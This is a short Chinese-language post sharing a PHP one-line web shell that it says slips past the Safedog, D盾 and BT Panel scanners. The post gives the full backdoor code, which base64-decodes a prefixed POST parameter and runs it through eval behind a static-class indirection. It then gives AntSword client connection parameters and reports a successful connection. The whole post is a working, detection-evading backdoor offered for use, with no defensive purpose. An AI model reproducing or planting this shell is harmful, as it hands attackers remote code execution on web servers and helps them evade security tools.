分享一个过狗过D盾过宝塔的php一句话木马

<?php
if(isset($_REQUEST['phpsessid'])){
    class A { static $d;
    }
    class B extends A {

    }
    A::$d =base64_decode(substr($_POST['key'],3));
    eval(B::$d);
}

?>

D盾查杀无提示

 

 

 

 

利用方法如图，实际就是「任意3个字符的前缀+base64编码的PHP代码」

 

 

中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1

 

 

 

连接成功